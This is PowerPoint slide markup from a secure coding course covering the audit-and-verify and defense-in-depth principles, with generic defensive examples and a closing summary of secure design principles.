              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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Contractual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obligations to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customers,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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compliance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organizations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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Legal</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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obligations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153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 Coding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Audit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and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35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Verify</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="4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-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Introduction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332268"/>
            <a:ext cx="10031022" cy="2914526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5078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Security incident investigations require information to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verify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extent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damages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1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When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started/e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What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mpli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What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areas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product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been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exploited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279316" indent="-266620" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="520"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="278681" algn="l"/>
                <a:tab pos="279316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Compliance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certifications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will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request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logs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audit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reports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  <a:tabLst>
                <a:tab pos="4769959" algn="l"/>
              </a:tabLst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2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verify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sensitive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	being</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="21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exposed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That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sufficient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information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logged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meet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needs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154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775759" y="216482"/>
            <a:ext cx="8638830" cy="7072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778" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2614"/>
              </a:lnSpc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 Coding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778" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2849"/>
              </a:lnSpc>
            </a:pP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Audit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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and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35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Verify</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="5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-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Security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Design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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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267122"/>
            <a:ext cx="9212085" cy="3080218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Alias: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none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Without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audit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trail,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most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attacks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repudiated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Logs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typically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after-thought,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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designed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primarily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developers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Consequences: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 designed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meet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Logs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protected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throughout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product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lifecycle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Audit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trail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reports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available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meet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compliance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needs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155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6986079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spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="1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5" dirty="0"/>
              <a:t>Audit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-35" dirty="0"/>
              <a:t>Verify</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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0"/>
            <a:ext cx="10188461" cy="3584276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Logs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Sh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uld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ritic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Must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ntain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s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ensiti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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="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Passwords,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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encryption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keys,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payment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card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information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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="5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50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possible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allow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properly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masked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kept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 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server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that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allows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user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Must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encrypted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moved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outside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Boundary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Must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sto</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-4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age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sto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45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able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media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lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc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Audit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reports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available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for easy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3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event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defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc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incident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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253417" y="2662754"/>
            <a:ext cx="4082622" cy="2548861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2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Implementation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2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Psychological</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Acceptability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Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Mechanism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0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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-8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Inputs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Prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attacks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0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Audit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-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249" spc="-6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spc="-25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Verify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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Defend</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-7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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-4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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Depth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157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960226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5" dirty="0"/>
              <a:t>Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Depth</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15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10234169" cy="3553169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Principle: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Use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layered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defenses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ollary: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just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rtu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ism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many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ways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defend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application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gi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 de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ail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if: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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="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make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any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kind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error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70"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Someone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else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negligent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malicious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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="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Circumstances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change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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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35" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>New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 attack methods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are developed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better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more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layer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defense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every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possible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threat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Many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defense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strategies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protect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multiple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threats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158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6489023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5" dirty="0"/>
              <a:t>Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Depth</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Example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32267"/>
            <a:ext cx="10164972" cy="4305186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46976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12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protect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from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SQL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Injection,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use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Input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Validation,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but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decide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use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Prepared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Statements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1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Err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 1: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870324" marR="5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2159"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="425"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Later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someone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decides that certain characters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need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to be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allowed in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 input, like </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-6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single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quotes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dashes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0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2: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70"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999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-420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new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encoding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method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devised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attacker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evades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validation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Err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 3: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lnSpc>
                <a:spcPts val="2279"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="165"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="7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7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new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feature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enhancements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adds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columns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DB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tables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input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variables,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870324" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2279"/>
              </a:lnSpc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but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no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one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validates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new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variable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Err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 4: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870324" marR="578946" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2159"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="425"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="7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75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bug fix in the validation code creates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an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opportunity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for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 validation to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be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-6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evaded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960226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5" dirty="0"/>
              <a:t>Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Depth</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15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672620" y="1079350"/>
            <a:ext cx="4163245" cy="4003267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586564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fortress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contains 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multiple</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="239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defense</a:t>
            </a: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systems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1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perimet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moat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uter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uter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ch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wers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5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igh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inner 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nner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ch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towers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970624" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="83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Combined,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-6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formidable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="239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defense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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="8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You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want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your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software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fortress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assets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64461" y="1518252"/>
            <a:ext cx="4530180" cy="3277650"/>
            <a:chOff x="6166067" y="1517754"/>
            <a:chExt cx="4531360" cy="32785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67" y="1517754"/>
              <a:ext cx="4530924" cy="32784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4600" y="1676400"/>
              <a:ext cx="4015740" cy="276301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159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1293813" y="1676399"/>
            <a:ext cx="10149250" cy="4906497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3838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6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lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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dirty="0"/>
              <a:t>Network and business application unavailable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28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dirty="0"/>
              <a:t>Significant financial losses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28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dirty="0"/>
              <a:t>Sensitive information compromised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28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dirty="0"/>
              <a:t>Fines, legal liability, and alienated customers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28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dirty="0"/>
              <a:t>Loss of productivity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§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3251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160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960226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5" dirty="0"/>
              <a:t>Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Depth</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15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699" y="1332267"/>
            <a:ext cx="10336378" cy="3518254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1195981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great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r>
              <a:rPr sz="23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managing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administrative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3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your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application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1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 u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add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 g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-4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897621" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="42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Unfortunately,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deployment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staff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setting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value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0.0.0.0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which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permits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all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addresses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9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anyone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199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administrative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interface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solve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this problem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by requiring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username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password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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="42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But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deployment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staff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creates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account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test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install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credentials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test/test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0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av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ti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ion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161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 Coding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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Defense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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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Depth</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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-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Security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Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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267123"/>
            <a:ext cx="9366350" cy="3736002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Alias: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Layered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Security,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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Belt and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Suspenders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Timelines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laziness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lead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developers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ignore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defense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depth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substantial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evidence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very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difficult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get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right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Changing conditions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result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expensive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patches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restore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situation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Negligence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responsible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up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third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exploits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Consequences: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2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4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el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5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elo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 de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enses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162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6986079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spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="1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15" dirty="0"/>
              <a:t>Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Depth</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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699" y="1312640"/>
            <a:ext cx="9833589" cy="3885188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When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architecting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application,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plan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 layered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defenses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Assume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any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defense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will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eventually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fail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ni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z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om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insiders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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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Maliciousness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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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Negligence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lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc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defense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be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overridden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human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mistake,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plan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for reviews</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc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validate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settings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correct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Deployment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testing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reviews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configurations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40" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Testing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customer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configurations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informing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them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dangerous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choices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(cloud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service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offerings)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5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alidate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 backu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ncry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7245" y="452895"/>
            <a:ext cx="5471005" cy="1783249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84730" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="10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srgbClr val="001F5F"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-30" dirty="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srgbClr val="001F5F"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="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srgbClr val="001F5F"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-60" dirty="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srgbClr val="001F5F"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001F5F"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> Principles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defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="001F5F"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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570059" lvl="1" indent="-215200" defTabSz="914126">
              <a:buSzPct val="109090"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="570694" algn="l"/>
              </a:tabLst>
            </a:pP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Understanding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Coding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Principles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70059" lvl="1" indent="-215200" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
              <a:buSzPct val="109090"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="570694" algn="l"/>
              </a:tabLst>
            </a:pP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Common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Coding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Principles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70059" lvl="1" indent="-215200" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="109090"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="570694" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Summary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164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639013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0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5" dirty="0"/>
              <a:t>Summary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32267"/>
            <a:ext cx="7851635" cy="391058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84730" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="10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Can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think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one-line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description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each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principle?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165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73088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105383" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="90143" marR="5195916">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="830"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Common Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Coding </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Principles </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-690" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr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700" y="1800688"/>
            <a:ext cx="3949306" cy="4367662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33011" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="184730" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="26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Design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–Establish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Boundaries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–Don't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Reinvent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Wheel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–Economy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Mechanism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–Trust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Reluctance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–Open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Design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–Minimize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Attack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Surface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–Secure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Weakest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Link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1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Default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–Use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Least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Privilege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–Use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Default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Deny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–Fail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Securely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742" y="367320"/>
            <a:ext cx="10512862" cy="864010"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10515600" h="864235">
                <a:moveTo>
                  <a:pt x="0" y="864108"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10515600" y="864108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10515600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25908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pPr defTabSz="914126"/>
            <a:endParaRPr sz="179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462" y="418742"/>
            <a:ext cx="5246176" cy="381929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pc="-5" dirty="0"/>
              <a:t>Common</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Principles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166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88211" y="747838"/>
            <a:ext cx="3838210" cy="3950575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340893" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2649"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Summary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72668" marR="133945" indent="-172668" algn="r" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2649"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="172668" algn="l"/>
              </a:tabLst>
            </a:pP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Communication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R="71099" algn="r" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pP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–Secure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Relationships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72668" marR="101570" indent="-172668" algn="r" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="509"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="172668" algn="l"/>
              </a:tabLst>
            </a:pP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239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Implementation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R="53959" algn="r" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pP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–Psychological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Acceptability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R="5078" algn="r" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
            </a:pP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–Least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Common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Mechanism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–Validate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Inputs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–Secure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at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Rest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–Prevent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Bypass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Attacks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–Audit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Verify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–Defense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Depth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167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639013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0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5" dirty="0"/>
              <a:t>Summary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267122"/>
            <a:ext cx="9967539" cy="887499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Which of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design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principles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do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you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think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most important?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Why?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Which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might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 the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hardest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sell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development team?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168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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>References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Summary</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="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–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="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Online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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>References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267123"/>
            <a:ext cx="5083756" cy="1748969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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="185364" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.securityinnovation.com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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
